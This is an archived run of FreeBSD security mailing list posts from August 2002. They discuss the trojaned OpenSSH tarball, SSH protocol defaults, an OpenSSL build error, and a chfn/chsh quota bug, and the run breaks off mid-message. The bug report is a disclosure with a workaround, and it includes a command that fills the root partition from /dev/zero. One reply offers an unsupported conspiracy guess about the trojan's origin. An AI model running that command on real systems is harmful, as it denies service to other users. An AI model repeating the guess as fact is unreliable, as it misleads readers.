<20020801154603.31872.qmail@web11601.mail.yahoo.com> Received: from [24.191.164.44] by web11601.mail.yahoo.com via HTTP; Thu, 01 Aug 2002 08:46:03 PDT Date: Thu, 1 Aug 2002 08:46:03 -0700 (PDT) From: Holt Grendal Subject: How was ftp.openbsd.org compromised? To: security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org How was ftp.openbsd.org compromised? Anything we need to worry about? __________________________________________________ Do You Yahoo!? Yahoo! Health - Feel better, live better http://health.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 8:49:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A49F737B400 for ; Thu, 1 Aug 2002 08:49:39 -0700 (PDT) Received: from bastet.rfc822.net (bastet.rfc822.net [64.81.113.233]) by mx1.FreeBSD.org (Postfix) with ESMTP id 534AB43E5E for ; Thu, 1 Aug 2002 08:49:39 -0700 (PDT) (envelope-from pde@bastet.rfc822.net) Received: by bastet.rfc822.net (Postfix, from userid 1001) id B946C9FDFA; Thu, 1 Aug 2002 10:50:18 -0500 (CDT) Date: Thu, 1 Aug 2002 10:50:18 -0500 From: Pete Ehlke To: Holt Grendal Cc: security@freebsd.org Subject: Re: How was ftp.openbsd.org compromised? Message-ID: <20020801155018.GA40565@rfc822.net> References: <20020801154603.31872.qmail@web11601.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020801154603.31872.qmail@web11601.mail.yahoo.com> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Aug 01, 2002 at 08:46:03AM -0700, Holt Grendal wrote: > How was ftp.openbsd.org compromised? > > Anything we need to worry about? > massively off topic here, but I suspect it has something to do with this: bastet[~]$ ftp ftp.openbsd.org [snip] 220 merlin FTP server (SunOS 4.1) ready. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 8:50:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3967337B400 for ; Thu, 1 Aug 2002 08:50:54 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9731C43E5E for ; Thu, 1 Aug 2002 08:50:53 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.5/8.12.5) with ESMTP id g71FopSE080801; Thu, 1 Aug 2002 11:50:51 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.1.6.0.20020801115320.030504c0@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Thu, 01 Aug 2002 11:53:59 -0400 To: Holt Grendal , security@FreeBSD.ORG From: Mike Tancsa Subject: Re: How was ftp.openbsd.org compromised? In-Reply-To: <20020801154603.31872.qmail@web11601.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020220) X-Spam-Status: No, hits=-3.5 required=7.0 tests=IN_REP_TO,SUBJ_ENDS_IN_Q_MARK version=2.31 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Note the OS 220 merlin FTP server (SunOS 4.1) ready. Name (ftp.openbsd.org:mdtancsa): At 08:46 AM 01/08/2002 -0700, Holt Grendal wrote: >How was ftp.openbsd.org compromised? > >Anything we need to worry about? > >__________________________________________________ >Do You Yahoo!? >Yahoo! Health - Feel better, live better >http://health.yahoo.com > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 8:57:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 44A4137B400 for ; Thu, 1 Aug 2002 08:57:15 -0700 (PDT) Received: from earth.hal.rcast.u-tokyo.ac.jp (earth.hal.rcast.u-tokyo.ac.jp [157.82.80.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 166B343EA9 for ; Thu, 1 Aug 2002 08:57:14 -0700 (PDT) (envelope-from konno@hal.rcast.u-tokyo.ac.jp) Received: from [192.168.1.8] (FLA9Aaa001.chb.mesh.ad.jp [61.193.68.129]) by earth.hal.rcast.u-tokyo.ac.jp (8.9.3/3.7W) with ESMTP id AAA08103; Fri, 2 Aug 2002 00:57:11 +0900 (JST) Date: Fri, 02 Aug 2002 00:57:11 +0900 From: Shunichi Konno To: security@freebsd.org Subject: Re: How was ftp.openbsd.org compromised? In-Reply-To: <20020801155018.GA40565@rfc822.net> References: <20020801154603.31872.qmail@web11601.mail.yahoo.com> <20020801155018.GA40565@rfc822.net> Message-Id: <20020802005529.98F7.KONNO@hal.rcast.u-tokyo.ac.jp> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.05.03 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sorry for posting an off-topic mail. Read this: 8.18 - Why does www.openbsd.org run on Solaris? http://www.OpenBSD.org/faq/faq8.html#wwwsolaris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 9:41: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2217937B429 for ; Thu, 1 Aug 2002 09:40:52 -0700 (PDT) Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by mx1.FreeBSD.org (Postfix) with SMTP id 0710343E4A for ; Thu, 1 Aug 2002 09:40:51 -0700 (PDT) (envelope-from sirmoo@cowbert.2y.net) Received: (qmail 18545 invoked by uid 1001); 1 Aug 2002 16:40:49 -0000 Date: Thu, 1 Aug 2002 12:40:49 -0400 From: "Peter C. Lai" To: Trevor Johnson Cc: Dag-Erling Smorgrav , Mike Tancsa , Ruslan Ermilov , security@FreeBSD.ORG Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] Message-ID: <20020801124049.B18439@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: <20020801083631.H19455-100000@blues.jpj.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020801083631.H19455-100000@blues.jpj.net>; from trevor@jpj.net on Thu, Aug 01, 2002 at 08:38:11AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Aug 01, 2002 at 08:38:11AM -0400, Trevor Johnson wrote: > On 1 Aug 2002, Dag-Erling Smorgrav wrote: > > > Trevor Johnson writes: > > > This is the section of http://www.openbsd.org/security.html#default which > > > I had hoped you would read: > > > [...] > > > > This is the section of Webster's 7th edition dictionary which I had > > hoped you would read: > > > > 1. no \(')n{o-}\ av [ME, fr. OE n{a-}, fr. ne not + > > {a-} always; akin to ON & OHG ne not, L ne-, Gk > > n{e-}- -- more at AYE] chiefly Scot > > 1a: NOT > > Why not? Do you have a reason? Production level reasons. 1. We already stated that it would be difficult for management of large installations to do this. 2. Stable is supposed to be stable. We've still got lots of people on 4.2,4.3,4.4, and 4.5 out there who are living quite nicely with their setups. We've got people who's installation is destined to sit in a corner to gather dust and do some processing every day, week, or month while the maintainers have either left or moved on and no one really notices it is there but would seriously "miss" it should it be disturbed in some way. (Note that lack of maintenance doesn't imply that the system wasn't set up or designed for this eventuality). This means that getting rid of protocol 1 completely really wouldn't "increase" the number of secure systems from a statistical standpoint. 3. We aren't OpenBSD. Our target audience is somewhat different. We wish to deliver an enterprise level operating solution for free. That is all we claim to do. We aren't trying to set any records (regarding security or otherwise). Making other people's lives harder for the sake of some hypothetical gains isn't good customer service or marketing. Migrate to OpenBSD if you want that sort of thing (and post your wishes on their mailing lists instead of here). > > > 1b: -- used as a function word to express the negative of an alternative > > choice or possibility > > 2: in no respect or degree -- used in comparisons > > 3: not so -- used to express negation, dissent, denial, or refusal > > How do you dissent? > > > 4: -- used with a following adjective to imply a meaning expressed by the > > opposite positive statement <~ uncertain terms> > > 5: -- used as a function word to emphasize a following negative or to > > introduce a more emphatic, explicit, or comprehensive statement > > 6: -- used as an interjection to express surprise, doubt, or incredulity > -- > Trevor Johnson > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology | Undergraduate Research Assistant Yale University School of Medicine SenseLab | Center for Medical Informatics | Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 10: 7:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B5BA937B400 for ; Thu, 1 Aug 2002 10:07:17 -0700 (PDT) Received: from woad.digitalcelt.com (woad.digitalcelt.com [65.68.132.170]) by mx1.FreeBSD.org (Postfix) with ESMTP id DAA0843E4A for ; Thu, 1 Aug 2002 10:07:13 -0700 (PDT) (envelope-from gobinau@digitalcelt.com) Received: by woad.digitalcelt.com (Postfix, from userid 1001) id 712CA572; Thu, 1 Aug 2002 12:05:04 -0500 (CDT) Content-Type: text/plain; charset="us-ascii" From: "Reuben A. Popp" Reply-To: gobinau@digitalcelt.com To: security@freebsd.org Subject: openssl build Date: Thu, 1 Aug 2002 12:04:45 -0500 User-Agent: KMail/1.4.2 MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200208011205.04188.gobinau@digitalcelt.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi all, =09I've run into a small conundrum, while building the recent port of ope= nssl=20 ((openssl-0.9.6e). It appears that the build works fine, except to the p= oint=20 where it begins to install the man pages. The following is my error snip= pet. =20 This box is running 4.6-STABLE if that helps any. And now, the snippet: making all in apps... making all in test... making all in tools... created directory `/usr/openssl' created directory `/usr/openssl/man' created directory `/usr/openssl/man/man1' created directory `/usr/openssl/man/man3' created directory `/usr/openssl/man/man5' created directory `/usr/openssl/man/man7' installing man1/CA.pl.1 /usr/bin/pod2man does not work properly ('MultilineTest' failed). Lookin= g for=20 another pod2man ... Can't locate Pod/Man.pm in @INC (@INC contains:=20 /usr/local/lib/perl5/site_perl/5.005/i386-freebsd=20 /usr/local/lib/perl5/site_perl/5.005 . /usr/libdata/perl/5.00503/mach=20 /usr/libdata/perl/5.00503) at /usr/local/bin/pod2man line 16. BEGIN failed--compilation aborted at /usr/local/bin/pod2man line 16. *** Error code 2 Stop in /usr/ports/security/openssl/work/openssl-0.9.6e. *** Error code 1 Stop in /usr/ports/security/openssl. [gobinau@www (/usr/ports/security/openssl)] (10:32:56)# Thanks in advance for any insight/suggestions :D =2E. With threats of gas and rose motif Their lips apart like a swollen rose Their tongues extend, and then retract A redcap, a redcap, before the kiss, before the kiss. =2E. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9SWo3l5MJ0L8ObVoRAup5AJsHGVLDKehkJudCiBl53xDUOHvx6wCfX74A 1aiKX2B72BJHpzK2J2nkuNY=3D =3DPnek -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 10:12:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D3A2637B400 for ; Thu, 1 Aug 2002 10:12:26 -0700 (PDT) Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5DFAE43E77 for ; Thu, 1 Aug 2002 10:12:26 -0700 (PDT) (envelope-from schulte+freebsd@nospam.schulte.org) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id 089BF243C0; Thu, 1 Aug 2002 12:12:25 -0500 (CDT) Received: from schulte-laptop.nospam.schulte.org (carpnod.schulte.org [209.134.156.200]) by clink.schulte.org (Postfix) with ESMTP id 31CC3243BE; Thu, 1 Aug 2002 12:12:23 -0500 (CDT) Message-Id: <5.1.1.6.2.20020801120928.044f1d88@localhost> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Thu, 01 Aug 2002 12:11:54 -0500 To: gobinau@digitalcelt.com, security@freebsd.org From: Christopher Schulte Subject: Re: openssl build In-Reply-To: <200208011205.04188.gobinau@digitalcelt.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:04 PM 8/1/2002 -0500, Reuben A. Popp wrote: >/usr/bin/pod2man does not work properly ('MultilineTest' failed). Looking >for >another pod2man ... >Can't locate Pod/Man.pm in @INC (@INC contains: Are you using /usr/local/bin/pod2man (maybe from a perl5.6 install?) versus /usr/bin/pod2man? If so, give /usr/bin/pod2man a whirl. -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 10:23: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5CFD937B400 for ; Thu, 1 Aug 2002 10:22:59 -0700 (PDT) Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by mx1.FreeBSD.org (Postfix) with ESMTP id D755743E5E for ; Thu, 1 Aug 2002 10:22:58 -0700 (PDT) (envelope-from schulte+freebsd@nospam.schulte.org) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id DE36F243C0; Thu, 1 Aug 2002 12:22:57 -0500 (CDT) Received: from schulte-laptop.nospam.schulte.org (carpnod.schulte.org [209.134.156.200]) by clink.schulte.org (Postfix) with ESMTP id EF208243BE; Thu, 1 Aug 2002 12:22:55 -0500 (CDT) Message-Id: <5.1.1.6.2.20020801121930.04440e80@localhost> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Thu, 01 Aug 2002 12:22:27 -0500 To: gobinau@digitalcelt.com, security@freebsd.org From: Christopher Schulte Subject: Re: openssl build In-Reply-To: <5.1.1.6.2.20020801120928.044f1d88@localhost> References: <200208011205.04188.gobinau@digitalcelt.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:11 PM 8/1/2002 -0500, Christopher Schulte wrote: >Are you using /usr/local/bin/pod2man (maybe from a perl5.6 install?) versus >/usr/bin/pod2man? If so, give /usr/bin/pod2man a whirl. More accurately, remove /usr/local/bin/pod2man from your path. This will force a 'workaround' and the install will continue. (sorry for followup, my original message was not clear enough) -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 11: 0: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BEE4C37B400 for ; Thu, 1 Aug 2002 10:59:58 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id BF4A643E65 for ; Thu, 1 Aug 2002 10:59:57 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.11.6/8.11.0) with ESMTP id g71I0Ps02395; Thu, 1 Aug 2002 12:00:25 -0600 (MDT) (envelope-from campbell@babayaga.neotext.ca) From: "Duncan Patton a Campbell is Dhu" To: Holt Grendal , security@FreeBSD.ORG Subject: Re: How was ftp.openbsd.org compromised? Date: Thu, 1 Aug 2002 12:00:25 -0600 Message-Id: <20020801180025.M96766@babayaga.neotext.ca> In-Reply-To: <20020801154603.31872.qmail@web11601.mail.yahoo.com> References: <20020801154603.31872.qmail@web11601.mail.yahoo.com> X-Mailer: Open WebMail 1.70 20020712 X-OriginatingIP: 127.0.0.1 (campbell) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ah yes, the Politics of Security rears its head. From the looks of it, this "trojan" was meant to be found: far to clumsy and obvious to be otherwise. Why? One can only speculate, but I'd hazard a guess that someone with access to the U of A's sunsite has a vested interest in defaming Open Source systems and software. So, who has lately claimed that Open Source is Evil and Anti-Capitalist? Nahh, couldn't be. That would mean bribes and blackmail. Mebbe the problem is that info really isn't Capital at all, and the bluff might be called. Duncan Patton a Campbell is Duibh ;-) ---------- Original Message ----------- From: Holt Grendal To: security@FreeBSD.ORG Sent: Thu, 1 Aug 2002 08:46:03 -0700 (PDT) Subject: How was ftp.openbsd.org compromised? > How was ftp.openbsd.org compromised? > > Anything we need to worry about? > > __________________________________________________ > Do You Yahoo!? > Yahoo! Health - Feel better, live better > http://health.yahoo.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the > message ------- End of Original Message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 12:35:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6423837B400; Thu, 1 Aug 2002 12:35:17 -0700 (PDT) Received: from studnet.sk (kripel.unitra.sk [193.87.12.67]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8962243E65; Thu, 1 Aug 2002 12:34:52 -0700 (PDT) (envelope-from rado@kripel.studnet.sk) Received: from kripel.studnet.sk (rado@localhost [IPv6:::1]) by studnet.sk (8.12.5/angel's version) with ESMTP id g71JYmvJ006863; Thu, 1 Aug 2002 21:34:48 +0200 (CEST) Received: (from rado@localhost) by kripel.studnet.sk (8.12.5/8.12.3/Submit) id g71JYmCA006862; Thu, 1 Aug 2002 21:34:48 +0200 (CEST) Date: Thu, 1 Aug 2002 21:34:48 +0200 From: Radko Keves To: freebsd-security@freebsd.org Cc: freebsd-current@freebsd.org Subject: possieble bug in chsh chfn Message-ID: <20020801193448.GA4806@studnet.sk> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Desription: unauthorized write access to /etc directory using chfn/chsh commands in FreeBSD 5.0-CURRENT. Contributing factors: In FreeBSD 5.0, it is possible to fill up the whole partition by using chfn/chsh commands. Normally, users have quotas set up on directories that are allowed to be written for them, e.g. home directory, /tmp, /var/tmp, etc. Let's say, a user has quotas set up this way: % quota -u rado Disk quotas for user rado (uid 1001): Filesystem usage quota limit grace files quota limit grace /home 66760 500000 550000 3481 0 0 /tmp 135193 260000 280000 5417 0 0 ... There's normally no need to set up quotas for other partitions (such as /, /usr, ...) because ordinary users have no permissions to write/change the files in that directories, e.g. in / or /etc. Symptoms: Our experience with the chsh/chfn commands shows that when a user changes his/her finger information/shell, these commands invoke vi editor with a temporary file stored in /tmp. Imagine that a user's quota exceeded his/her limit for /tmp. Our ordinary user did this by filling up /tmp partition with many large files. chfn/chsh commands then stored their temporary files in /etc directory with given user's permissions, e.g.: % id happy uid=2006(happy) gid=58(st1999) groups=58(st1999) % quota -u happy ... /tmp 21995* 20000 22000 7days 6 0 0 ... (We can see that the disk quota exceeded in /tmp for user happy) % ls -ld /etc drwxr-xr-x 20 root wheel 22016 Aug 1 19:22 /etc % ls -l /etc | grep happy -rw------- 1 happy st1999 157278362 Aug 1 19:19 pw.BEMwxq -rw------- 1 happy st1999 154 Aug 1 19:22 pw.KxGCF3 -rw------- 1 happy st1999 157278362 Aug 1 19:19 pw.iW7Pmt -rw------- 1 happy st1999 157278362 Aug 1 19:20 pw.rhJq0s -rw------- 1 happy st1999 157278374 Aug 1 19:16 pw.tpPLK4 Now it is possible for such a user to fill up the root partition without having a permission set on /, e.g. with % cat /dev/zero >> /etc/pw.KxGCF3 Workaround: Our workaround is to either set up a quotas for a root partition or disable chsh/chfn commands. Important Notices: 1. chpass, ypchpass, ypchfn, and ypchsh commands seem to be also affected by the symptoms described above because they are just hard links... :) 2. When experimenting with a chpass command, it caused a segmentation fault when used with -a argument because of a NULL pointer comparation in chpass.c, line 169: (no getpw* (3) library call invoked!!!) if ((pw->pw_fields & _PWF_SOURCE) == _PWF_NIS) % id happy uid=2006(happy) gid=58(st1999) groups=58(st1999) % chpass -a qqqqq Segmentation fault chpass doesn't seem to be locally exploitable. Some changes to a source code are needed for normal operation. Credits: pali@unitra.sk happy@unitra.sk rado@studnet.sk -- -------------- bye R.R.K.K. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 16:39:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3692737B400 for ; Thu, 1 Aug 2002 16:39:13 -0700 (PDT) Received: from jive.SoftHome.net (jive.SoftHome.net [66.54.152.27]) by mx1.FreeBSD.org (Postfix) with SMTP id A4F3743E6A for ; Thu, 1 Aug 2002 16:39:11 -0700 (PDT) (envelope-from yid@softhome.net) Received: (qmail 30974 invoked by uid 417); 1 Aug 2002 23:39:11 -0000 Received: from shunt-smtp-out-0 (HELO softhome.net) (172.16.3.12) by shunt-smtp-out-0 with SMTP; 1 Aug 2002 23:39:11 -0000 Received: from unknown ([216.194.6.221]) (AUTH: LOGIN yid@softhome.net) by softhome.net with esmtp; Thu, 01 Aug 2002 17:39:09 -0600 Date: Thu, 1 Aug 2002 19:37:39 -0400 From: Joshua Lee To: Artur Lindgren Cc: freebsd-security@FreeBSD.ORG Subject: Re: Trojan located in latest openssh tar files Message-Id: <20020801193739.3b40bcb8.yid@softhome.net> In-Reply-To: References: Organization: Plan B Software Labs X-Mailer: Sylpheed version 0.8.0claws (GTK+ 1.2.10; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 1 Aug 2002 14:11:24 +0200 Artur Lindgren wrote: > I noticed that openssh-3.4p has a trojan horse (available from > >ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz > and some of the mirrors. Is this a problem for someone who makes world with FreeBSD and gets OpenSSH from the source tree or only for people who get OpenSSH via ports? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 16:58:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 97D7537B400 for ; Thu, 1 Aug 2002 16:58:16 -0700 (PDT) Received: from goofy.epylon.com (ip216-203-220-162.z220-203-216.customer.algx.net [216.203.220.162]) by mx1.FreeBSD.org (Postfix) with ESMTP id D2E5C43E65 for ; Thu, 1 Aug 2002 16:58:15 -0700 (PDT) (envelope-from jdicioccio@epylon.com) Received: by goofy.epylon.lan with Internet Mail Service (5.5.2653.19) id ; Thu, 1 Aug 2002 16:58:15 -0700 Message-ID: <657B20E93E93D4118F9700D0B73CE3EA02FFF649@goofy.epylon.lan> From: "DiCioccio, Jason" To: 'Joshua Lee' , Artur Lindgren Cc: freebsd-security@FreeBSD.ORG Subject: RE: Trojan located in latest openssh tar files Date: Thu, 1 Aug 2002 16:58:14 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Neither -- unless you tell it to ignore the checksum on the port. As far as the source tree, OpenSSH 3.4 was imported a while back, so I don't think the same problem would exist as the trojan seemed to originate yesterday. Cheers, - -JD- - -----Original Message----- From: Joshua Lee [mailto:yid@softhome.net] Sent: Thursday, August 01, 2002 4:38 PM To: Artur Lindgren Cc: freebsd-security@FreeBSD.ORG Subject: Re: Trojan located in latest openssh tar files On Thu, 1 Aug 2002 14:11:24 +0200 Artur Lindgren wrote: > I noticed that openssh-3.4p has a trojan horse (available from > >ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar. > >gz > and some of the mirrors. Is this a problem for someone who makes world with FreeBSD and gets OpenSSH from the source tree or only for people who get OpenSSH via ports? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.4 iQA/AwUBPUnLOTKUHizV76d/EQLKngCgp0OoF/F0dNTAEDhXr5M5bYoBqXgAn2bX E+OcZTZ+1VGVNUXzKauaKK9k =br5K -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 16:59:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BF31F37B400 for ; Thu, 1 Aug 2002 16:59:47 -0700 (PDT) Received: from russian-caravan.cloud9.net (russian-caravan.cloud9.net [168.100.1.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 68F1A43E42 for ; Thu, 1 Aug 2002 16:59:47 -0700 (PDT) (envelope-from Hostmaster@Video2Video.Com) Received: from earl-grey.cloud9.net (earl-grey.cloud9.net [168.100.1.1]) by russian-caravan.cloud9.net (Postfix) with ESMTP id 1A0A928E32; Thu, 1 Aug 2002 19:59:18 -0400 (EDT) Date: Thu, 1 Aug 2002 19:59:08 -0400 (EDT) From: Peter Leftwich X-X-Sender: To: Artur Lindgren Cc: FreeBSD Security LIST Subject: Re: Trojan located in latest openssh tar files In-Reply-To: <20020801193739.3b40bcb8.yid@softhome.net> Message-ID: <20020801195813.Q12126-100000@earl-grey.cloud9.net> Organization: Video2Video Services - http://Www.Video2Video.Com MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 1 Aug 2002, Joshua Lee wrote: > On Thu, 1 Aug 2002 14:11:24 +0200 Artur Lindgren wrote: > > I noticed that openssh-3.4p has a trojan horse (available from ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz and some of the mirrors. > Is this a problem for someone who makes world with 